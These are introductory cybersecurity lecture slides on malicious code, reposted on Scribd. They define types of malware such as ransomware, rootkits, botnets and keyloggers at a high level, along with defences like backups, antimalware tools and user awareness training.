Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
45 views19 pages

Topic 3 - Malicious Code

This document provides an overview of various types of malicious code, including ransomware, Trojans, worms, rootkits, backdoors, bots, keyloggers, logic bombs, viruses, spyware, potentially unwanted programs, and adversarial artificial intelligence. It defines each type of malicious code and describes how they function to harm systems, steal information, or gain unauthorized access. The document emphasizes that prevention requires a combination of tools like antivirus software alongside security best practices and user awareness training.

Uploaded by

s.l.mills86
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
45 views19 pages

Topic 3 - Malicious Code

This document provides an overview of various types of malicious code, including ransomware, Trojans, worms, rootkits, backdoors, bots, keyloggers, logic bombs, viruses, spyware, potentially unwanted programs, and adversarial artificial intelligence. It defines each type of malicious code and describes how they function to harm systems, steal information, or gain unauthorized access. The document emphasizes that prevention requires a combination of tools like antivirus software alongside security best practices and user awareness training.

Uploaded by

s.l.mills86
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 19

ITI581 CYBER SECURITY FUNDAMENTALS

Topic 3
Malicious Code
Topic Reading

• Chapter 3: Malicious Code.

• Interact content.
Malware

• Malware describes a broad range of software that is designed specifically


to cause harm to systems, devices, networks or users.

• Can be used to gather information, gain unauthorized access, elevate


privileges and perform unwanted actions resulting in breaches to C, I or A.

• Comes in many forms:


• Ransomware.
• RA Trojans/Trojans.
• Bots.
• Command-and-control.
Ransomware

• Increasingly common malware that takes over target systems and


demands ransom.

• Crypto ransomware encrypts target systems, rendering them useless, until


a ransom is paid.

• Other ransomware might may threaten to release confidential information


unless a ransom is paid.

• Can be very difficult to recover from but best protection is a plain and
simple backup.

• Cryptanalysis can be difficult and often fruitless.


Trojans

• Software that masquerades as legitimate software but actually provides


unauthorized access to attackers.

• Require some form of human interaction to spread and operate.

• Remote Access Trojans (RATs) provide unauthorized remote access.

• Often combated using antimalware tools and security awareness training.


Worms

• Are self-replicating.

• Often associated with spreading via attacks on vulnerable services but can
also propagate through automated means such as e-mail or file shares.

• Because they can self-install without human interaction they can be quick
to spread and difficult to stop.
Rootkits

• Malware specifically written to permit unauthorized access to systems via a


backdoor.

• Modern rootkits are very good at concealing their presence through:


• Use of filesystem drivers.
• Infection of master boot records (MBR) of disks.

• Detection can be tough because systems infected with rootkits is


untrustworthy.

• Best to use a trusted system to inspect suspect infected systems.

• Rootkit detection looks for signatures and known behaviours.


Backdoors

• Methods and tools that allow bypassing of regular authentication methods.

• Like rootkits they are sometimes used by manufacturers to provide ongoing


access to systems and software.

• Backdoors can sometimes be detected by finding unexpected open ports


or services but some may use legitimate services.
Bots

• Groups of remote-controlled systems or devices that have a malware


infection.

• Groups more commonly referred to as botnets.

• Botnets are used to control targets in order to use them to launch various
types of attacks against further target systems.

• Many botnet command and control systems operate in client-server mode.


Botnets

Source: https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fblog.eccouncil.org%2Fwp-content%2Fuploads%2F2018%2F12%2Fthe-structure-of-a-botnet.png&f=1&nofb=1
Keyloggers

• Programs that, once loaded, may capture keyboard keystrokes, mouse


movement, touchscreen inputs or credit care swipes from infected devices.

• Can work in various ways including capturing via the kernel, through APIs
or scripts, or directly from memory.

• Best defense is through best practice software maintenance and


comprehensive AV/Malware solution.
Logic Bombs

• Functions or codes maliciously placed inside other programs.

• Are activated when defined conditions are met.

• Uncommon but when activated can create significant issues.


Viruses

• Most well known, widespread and understood of the malware types.

• Are spread via varied infection mechanisms and have many different
attacks methods and targets.

Virus Type Description


Memory resident Remain in memory while the device is running.
Non-memory Execute, spread and then shutdown to prevent
resident detection.
Boot sector Reside on disk boot sectors.
Macro Use macros or code inside common applications to
spread.
E-mail Spread via e-mail attachments or flaws within clients.
Spyware

• Designed to obtain information about a target.

• Many different variants and deployment methods.

• May be innocuous but certain types are quite malicious.

• Often associated with identity theft and fraud.

• Most frequently combated using anti-malware tools.

• User awareness is also an important tool.


Potentially Unwanted Programs (PUPs)

• Many types of malware are malicious and cause damage.

• PUPs are different in that they may not cause any harm directly.

• Installed without users knowledge or permission.

• Can include adware, browser toolbars, tracking programs and other types.

• PUPs don’t always indicate that a system has been seriously


compromised.
Malicious Code

• Includes scripts or bespoke code that isn’t malware but is may still be used
by attackers.

• Attacks can happen locally or remotely.

• May leverage built-in OS tools such as PowerShell, Visual Basic and


macros in Windows environments or Bash or Python in Linux
environments.

• Can be difficult to guard against because they leverage legitimate and well
used tools.
Adversarial Artificial Intelligence (AAI)

• A developing field where AI used to launch attacks.

• Focus is typically on poisoning of data, inserting malicious analytics or


algorithms into systems or privacy based attacks.
Big Picture

• Malware has many variants.

• Some is malicious and some is simply used to spy on us, advertise


products or somehow socially manipulate us.

• Depending on the type of malware prevention of infection and protection


against can be very challenging.

• Best practice software configuration, patching and AV tools are a good


start.

• Security awareness training assist greatly.


Thanks for watching!

You might also like